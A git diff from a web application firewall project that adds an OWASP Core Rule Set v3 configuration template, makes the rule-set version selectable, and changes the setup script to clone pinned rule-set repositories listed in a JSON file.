to +# protect your service with ModSecurity. +# +# Uncomment this rule to enable this feature: +# +#SecAction "id:900400,\ +# phase:1,\ +# pass,\ +# nolog,\ +# setvar:tx.sampling_percentage=100" + + +# +# -- [[ Project Honey Pot HTTP Blacklist ]] ------------------------------------ +# +# Optionally, you can check the client IP address against the Project Honey Pot +# HTTPBL (dnsbl.httpbl.org). In order to use this, you need to register to get a +# free API key. Set it here with SecHttpBlKey. +# +# Project Honeypot returns multiple different malicious IP types. +# You may specify which you want to block by enabling or disabling them below. +# +# Ref: https://www.projecthoneypot.org/httpbl.php +# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecHttpBlKey +# +# Uncomment these rules to use this feature: +# +#SecHttpBlKey XXXXXXXXXXXXXXXXX +#SecAction "id:900500,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.block_search_ip=1,\ +# setvar:tx.block_suspicious_ip=1,\ +# setvar:tx.block_harvester_ip=1,\ +# setvar:tx.block_spammer_ip=1" + + +# +# -- [[ GeoIP Database ]] ------------------------------------------------------ +# +# There are some rulesets that inspect geolocation data of the client IP address +# (geoLookup). The CRS uses geoLookup to implement optional country blocking. +# +# To use geolocation, we make use of the MaxMind GeoIP database. +# This database is not included with the CRS and must be downloaded. +# +# There are two formats for the GeoIP database. ModSecurity v2 uses GeoLite (.dat files), +# and ModSecurity v3 uses GeoLite2 (.mmdb files). +# +# If you use ModSecurity 3, MaxMind provides a binary for updating GeoLite2 files, +# see https://github.com/maxmind/geoipupdate. +# +# Download the package for your OS, and read https://dev.maxmind.com/geoip/geoipupdate/ +# for configuration options. +# +# Warning: GeoLite (not GeoLite2) databases are considered legacy, and not being updated anymore. +# See https://support.maxmind.com/geolite-legacy-discontinuation-notice/ for more info. +# +# Therefore, if you use ModSecurity v2, you need to regenerate updated .dat files +# from CSV files first. +# +# You can achieve this using https://github.com/sherpya/geolite2legacy +# Pick the zip files from maxmind site: +# https://geolite.maxmind.com/download/geoip/database/GeoLite2-Country-CSV.zip +# +# Follow the guidelines for installing the tool and run: +# ./geolite2legacy.py -i GeoLite2-Country-CSV.zip \ +# -f geoname2fips.csv -o /usr/share/GeoliteCountry.dat +# +# Update the database regularly, see Step 3 of the configuration link above. +# +# By default, when you execute `sudo geoipupdate` on Linux, files from the free database +# will be downloaded to `/usr/share/GeoIP` (both v1 and v2). +# +# Then choose from: +# - `GeoLite2-Country.mmdb` (if you are using ModSecurity v3) +# - `GeoLiteCountry.dat` (if you are using ModSecurity v2) +# +# Ref: http://blog.spiderlabs.com/2010/10/detecting-malice-with-modsecurity-geolocation-data.html +# Ref: http://blog.spiderlabs.com/2010/11/detecting-malice-with-modsecurity-ip-forensics.html +# +# Uncomment only one of the next rules here to use this feature. +# Choose the one depending on the ModSecurity version you are using, and change the path accordingly: +# +# For ModSecurity v3: +#SecGeoLookupDB /usr/share/GeoIP/GeoLite2-Country.mmdb +# For ModSecurity v2 (points to the converted one): +#SecGeoLookupDB /usr/share/GeoIP/GeoLiteCountry.dat + +# +# -=[ Block Countries ]=- +# +# Rules in the IP Reputation file can check the client against a list of high +# risk country codes. These countries have to be defined in the variable +# tx.high_risk_country_codes via their ISO 3166 two-letter country code: +# https://en.wikipedia.org/wiki/ISO_3166-1_alpha-2#Officially_assigned_code_elements +# +# If you are sure that you are not getting any legitimate requests from a given +# country, then you can disable all access from that country via this variable. +# The rule performing the test has the rule id 910100. +# +# This rule requires SecGeoLookupDB to be enabled and the GeoIP database to be +# downloaded (see the section "GeoIP Database" above.) +# +# By default, the list is empty. A list used by some sites was the following: +# setvar:'tx.high_risk_country_codes=UA ID YU LT EG RO BG TR RU PK MY CN'" +# +# Uncomment this rule to use this feature: +# +#SecAction \ +# "id:900600,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.high_risk_country_codes='" + + +# +# -- [[ Anti-Automation / DoS Protection ]] ------------------------------------ +# +# Optional DoS protection against clients making requests too quickly. +# +# When a client is making more than 100 requests (excluding static files) within +# 60 seconds, this is considered a 'burst'. After two bursts, the client is +# blocked for 600 seconds. +# +# Requests to static files are not counted towards DoS; they are listed in the +# 'tx.static_extensions' setting, which you can change in this file (see +# section "HTTP Policy Settings"). +# +# For a detailed description, see rule file REQUEST-912-DOS-PROTECTION.conf. +# +# Uncomment this rule to use this feature: +# +#SecAction \ +# "id:900700,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.dos_burst_time_slice=60',\ +# setvar:'tx.dos_counter_threshold=100',\ +# setvar:'tx.dos_block_timeout=600'" + + +# +# -- [[ Check UTF-8 encoding ]] ------------------------------------------------ +# +# The CRS can optionally check request contents for invalid UTF-8 encoding. +# We only want to apply this check if UTF-8 encoding is actually used by the +# site; otherwise it will result in false positives. +# +# Uncomment this rule to use this feature: +# +#SecAction \ +# "id:900950,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.crs_validate_utf8_encoding=1" + + +# +# -- [[ Blocking Based on IP Reputation ]] ------------------------------------ +# +# Blocking based on reputation is permanent in the CRS. Unlike other rules, +# which look at the individual request, the blocking of IPs is based on +# a persistent record in the IP collection, which remains active for a +# certain amount of time. +# +# There are two ways an individual client can become flagged for blocking: +# - External information (RBL, GeoIP, etc.) +# - Internal information (Core Rules) +# +# The record in the IP collection carries a flag, which tags requests from +# individual clients with a flag named IP.reput_block_flag. +# But the flag alone is not enough to have a client blocked. There is also +# a global switch named tx.do_reput_block. This is off by default. If you set +# it to 1 (=On), requests from clients with the IP.reput_block_flag will +# be blocked for a certain duration. +# +# Variables +# ip.reput_block_flag Blocking flag for the IP collection record +# ip.reput_block_reason Reason (= rule message) that caused to blocking flag +# tx.do_reput_block Switch deciding if we really block based on flag +# tx.reput_block_duration Setting to define the duration of a block +# +# It may be important to know, that all the other core rules are skipped for +# requests, when it is clear that they carry the blocking flag in question. +# +# Uncomment this rule to use this feature: +# +#SecAction \ +# "id:900960,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.do_reput_block=1" +# +# Uncomment this rule to change the blocking time: +# Default: 300 (5 minutes) +# +#SecAction \ +# "id:900970,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.reput_block_duration=300" + + +# +# -- [[ Collection timeout ]] -------------------------------------------------- +# +# Set the SecCollectionTimeout directive from the ModSecurity default (1 hour) +# to a lower setting which is appropriate to most sites. +# This increases performance by cleaning out stale collection (block) entries. +# +# This value should be greater than or equal to: +# tx.reput_block_duration (see section "Blocking Based on IP Reputation") and +# tx.dos_block_timeout (see section "Anti-Automation / DoS Protection"). +# +# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecCollectionTimeout + +# Please keep this directive uncommented. +# Default: 600 (10 minutes) +SecCollectionTimeout 600 + + +# +# -- [[ End of setup ]] -------------------------------------------------------- +# +# The CRS checks the tx.crs_setup_version variable to ensure that the setup +# has been loaded. If you are not planning to use this setup template, +# you must manually set the tx.crs_setup_version variable before including +# the CRS rules/* files. +# +# The variable is a numerical representation of the CRS version number. +# E.g., v3.0.0 is represented as 300. +# +SecAction \ + "id:900990,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + setvar:tx.crs_setup_version=335" diff --git a/src/common/core/modsecurity/files/crs-setup.conf b/src/common/core/modsecurity/files/crs-setup-v4.conf similarity index 100% rename from src/common/core/modsecurity/files/crs-setup.conf rename to src/common/core/modsecurity/files/crs-setup-v4.conf diff --git a/src/common/core/modsecurity/misc/crs.sh b/src/common/core/modsecurity/misc/crs.sh index 037b90f3b..6d9f51028 100755 --- a/src/common/core/modsecurity/misc/crs.sh +++ b/src/common/core/modsecurity/misc/crs.sh @@ -3,7 +3,12 @@ function git_secure_clone() { repo="$1" commit="$2" - folder="$(echo "$repo" | sed -E "s@https://github.com/.*/(.*)\.git@\1@")" + folder="$3" + + if [ -z "$folder" ] || [ "$folder" == "" ] ; then + folder="$(echo "$repo" | rev | cut -d '/' -f 1 | rev | sed -E "s@\.git@@")" + fi + if [ ! -d "files/${folder}" ] ; then output="$(git clone "$repo" "files/${folder}" 2>&1)" # shellcheck disable=SC2181 @@ -45,11 +50,25 @@ function do_and_check_cmd() { echo "$output" exit $ret fi - #echo $output return 0 } -# CRS v4.0.0 -echo "ℹ️ Download CRS" -git_secure_clone "https://github.com/coreruleset/coreruleset.git" "1d95422bb31983a5290720b7fb662ce3dd51f753" -do_and_check_cmd cp -r files/coreruleset/crs-setup.conf.example files/crs-setup.conf +rm -rf files/* + +jq -c .git_repository[] misc/versions.json | while read -r repo +do + id="$(echo "$repo" | jq -r .id)" + name="$(echo "$repo" | jq -r .name)" + url="$(echo "$repo" | jq -r .url)" + commit="$(echo "$repo" | jq -r .commit)" + post_install="$(echo "$repo" | jq -r .post_install)" + + echo "ℹ️ Clone ${name} from $url at commit/version $commit" + + git_secure_clone "$url" "$commit" "$id" + + if [ "$post_install" != "null" ]; then + echo "ℹ️ Running post install script for ${name}" + bash -c "$post_install" + fi +done diff --git a/src/common/core/modsecurity/misc/versions.json b/src/common/core/modsecurity/misc/versions.json new file mode 100644 index 000000000..7a2fa6df8 --- /dev/null +++ b/src/common/core/modsecurity/misc/versions.json @@ -0,0 +1,18 @@ +{ + "git_repository": [ + { + "id": "coreruleset-v3", + "name": "Coreruleset v3.3.5", + "url": "https://github.com/coreruleset/coreruleset.git", + "commit": "0bd51ff806c68e2a54c4d60ca13f731c5355696d", + "post_install": "cp files/coreruleset-v3/crs-setup.conf.example files/crs-setup-v3.conf" + }, + { + "id": "coreruleset-v4", + "name": "Coreruleset v4.0.0", + "url": "https://github.com/coreruleset/coreruleset.git", + "commit": "1d95422bb31983a5290720b7fb662ce3dd51f753", + "post_install": "cp files/coreruleset-v4/crs-setup.conf.example files/crs-setup-v4.conf" + } + ] +} diff --git a/src/common/core/modsecurity/plugin.json b/src/common/core/modsecurity/plugin.json index 4b4d302df..7a9a7f277 100644 --- a/src/common/core/modsecurity/plugin.json +++ b/src/common/core/modsecurity/plugin.json @@ -1,56 +1,66 @@ -{ - "id": "modsecurity", - "name": "ModSecurity", - "description": "Management of the ModSecurity WAF.", - "version": "1.0", - "stream": "no", - "settings": { - "USE_MODSECURITY": { - "context": "multisite", - "default": "yes", - "help": "Enable ModSecurity WAF.", - "id": "use-modsecurity", - "label": "Use ModSecurity", - "regex": "^(yes|no)$", - "type": "check" - }, - "USE_MODSECURITY_CRS": { - "context": "multisite", - "default": "yes", - "help": "Enable OWASP Core Rule Set.", - "id": "use-modsecurity-crs", - "label": "Use Core Rule Set", - "regex": "^(yes|no)$", - "type": "check" - }, - "MODSECURITY_SEC_AUDIT_ENGINE": { - "context": "multisite", - "default": "RelevantOnly", - "help": "SecAuditEngine directive of ModSecurity.", - "id": "modsecurity-sec-audit-engine", - "label": "SecAuditEngine", - "regex": "^(On|RelevantOnly|Off)$", - "type": "select", - "select": ["On", "RelevantOnly", "Off"] - }, - "MODSECURITY_SEC_RULE_ENGINE": { - "context": "multisite", - "default": "On", - "help": "SecRuleEngine directive of ModSecurity.", - "id": "modsecurity-sec-rule-engine", - "label": "SecRuleEngine", - "regex": "^(On|DetectionOnly|Off)$", - "type": "select", - "select": ["On", "DetectionOnly", "Off"] - }, - "MODSECURITY_SEC_AUDIT_LOG_PARTS": { - "context": "multisite", - "default": "ABCFHZ", - "help": "SecAuditLogParts directive of ModSecurity.", - "id": "modsecurity-sec-audit-log-parts", - "label": "SecAuditLogParts", - "regex": "^A(([B-K])(?!.*\\2))+Z$", - "type": "text" - } - } -} +{ + "id": "modsecurity", + "name": "ModSecurity", + "description": "Management of the ModSecurity WAF.", + "version": "1.0", + "stream": "no", + "settings": { + "USE_MODSECURITY": { + "context": "multisite", + "default": "yes", + "help": "Enable ModSecurity WAF.", + "id": "use-modsecurity", + "label": "Use ModSecurity", + "regex": "^(yes|no)$", + "type": "check" + }, + "USE_MODSECURITY_CRS": { + "context": "multisite", + "default": "yes", + "help": "Enable OWASP Core Rule Set.", + "id": "use-modsecurity-crs", + "label": "Use Core Rule Set", + "regex": "^(yes|no)$", + "type": "check" + }, + "MODSECURITY_CRS_VERSION": { + "context": "multisite", + "default": "3", + "help": "Version of the OWASP Core Rule Set to use.", + "id": "modsecurity-crs-version", + "label": "Core Rule Set Version", + "regex": "^(3|4)$", + "type": "select", + "select": ["3", "4"] + }, + "MODSECURITY_SEC_AUDIT_ENGINE": { + "context": "multisite", + "default": "RelevantOnly", + "help": "SecAuditEngine directive of ModSecurity.", + "id": "modsecurity-sec-audit-engine", + "label": "SecAuditEngine", + "regex": "^(On|RelevantOnly|Off)$", + "type": "select", + "select": ["On", "RelevantOnly", "Off"] + }, + "MODSECURITY_SEC_RULE_ENGINE": { + "context": "multisite", + "default": "On", + "help": "SecRuleEngine directive of ModSecurity.", + "id": "modsecurity-sec-rule-engine", + "label": "SecRuleEngine", + "regex": "^(On|DetectionOnly|Off)$", + "type": "select", + "select": ["On", "DetectionOnly", "Off"] + }, + "MODSECURITY_SEC_AUDIT_LOG_PARTS": { + "context": "multisite", + "default": "ABCFHZ", + "help": "SecAuditLogParts directive of ModSecurity.", + "id": "modsecurity-sec-audit-log-parts", + "label": "SecAuditLogParts", + "regex": "^A(([B-K])(?!.*\\2))+Z$", + "type": "text" + } + } +} diff --git a/src/linux/scripts/start.sh b/src/linux/scripts/start.sh index 4710fd5d9..6eae40b9c 100644 --- a/src/linux/scripts/start.sh +++ b/src/linux/scripts/start.sh @@ -96,7 +96,7 @@ function start() { # Create dummy variables.env if [ ! -f /etc/bunkerweb/variables.env ]; then - sudo -E -u nginx -g nginx /bin/bash -c "echo -ne '# remove IS_LOADING=yes when your config is ready\nIS_LOADING=yes\nDNS_RESOLVERS=8.8.8.8 8.8.4.4\nHTTP_PORT=80\nHTTPS_PORT=443\nAPI_LISTEN_IP=127.0.0.1\nSERVER_NAME=\n' > /etc/bunkerweb/variables.env" + sudo -E -u nginx -g nginx /bin/bash -c "echo -ne '# remove IS_LOADING=yes when your config is ready\nIS_LOADING=yes\nDNS_RESOLVERS=8.8.8.8 8.8.4.4\nHTTP_PORT=80\nHTTPS_PORT=443\nAPI_LISTEN_IP=127.0.0.1\nSERVER_NAME=\nMODSECURITY_CRS_VERSION=4\n' > /etc/bunkerweb/variables.env" log "SYSTEMCTL" "ℹ️" "Created dummy variables.env file" fi @@ -151,7 +151,11 @@ function start() { if [ "$HTTPS_PORT" = "" ] ; then HTTPS_PORT="443" fi - sudo -E -u nginx -g nginx /bin/bash -c "echo -ne 'IS_LOADING=yes\nUSE_BUNKERNET=no\nSEND_ANONYMOUS_REPORT=no\nSERVER_NAME=\nDNS_RESOLVERS=${DNS_RESOLVERS}\nAPI_HTTP_PORT=${API_HTTP_PORT}\nAPI_LISTEN_IP=${API_LISTEN_IP}\nAPI_SERVER_NAME=${API_SERVER_NAME}\nAPI_WHITELIST_IP=${API_WHITELIST_IP}\nUSE_REAL_IP=${USE_REAL_IP}\nUSE_PROXY_PROTOCOL=${USE_PROXY_PROTOCOL}\nREAL_IP_FROM=${REAL_IP_FROM}\nREAL_IP_HEADER=${REAL_IP_HEADER}\nHTTP_PORT=${HTTP_PORT}\nHTTPS_PORT=${HTTPS_PORT}\n' > /var/tmp/bunkerweb/tmp.env" + MODSECURITY_CRS_VERSION="$(grep "^MODSECURITY_CRS_VERSION=" /etc/bunkerweb/variables.env | cut -d '=' -f 2)" + if [ "$MODSECURITY_CRS_VERSION" = "" ] ; then + MODSECURITY_CRS_VERSION="4" + fi + sudo -E -u nginx -g nginx /bin/bash -c "echo -ne 'IS_LOADING=yes\nUSE_BUNKERNET=no\nSEND_ANONYMOUS_REPORT=no\nSERVER_NAME=\nMODSECURITY_CRS_VERSION=${MODSECURITY_CRS_VERSION}\nDNS_RESOLVERS=${DNS_RESOLVERS}\nAPI_HTTP_PORT=${API_HTTP_PORT}\nAPI_LISTEN_IP=${API_LISTEN_IP}\nAPI_SERVER_NAME=${API_SERVER_NAME}\nAPI_WHITELIST_IP=${API_WHITELIST_IP}\nUSE_REAL_IP=${USE_REAL_IP}\nUSE_PROXY_PROTOCOL=${USE_PROXY_PROTOCOL}\nREAL_IP_FROM=${REAL_IP_FROM}\nREAL_IP_HEADER=${REAL_IP_HEADER}\nHTTP_PORT=${HTTP_PORT}\nHTTPS_PORT=${HTTPS_PORT}\n' > /var/tmp/bunkerweb/tmp.env" sudo -E -u nginx -g nginx /bin/bash -c "PYTHONPATH=/usr/share/bunkerweb/deps/python/ /usr/share/bunkerweb/gen/main.py --variables /var/tmp/bunkerweb/tmp.env --no-linux-reload" # shellcheck disable=SC2181 if [ $? -ne 0 ] ; then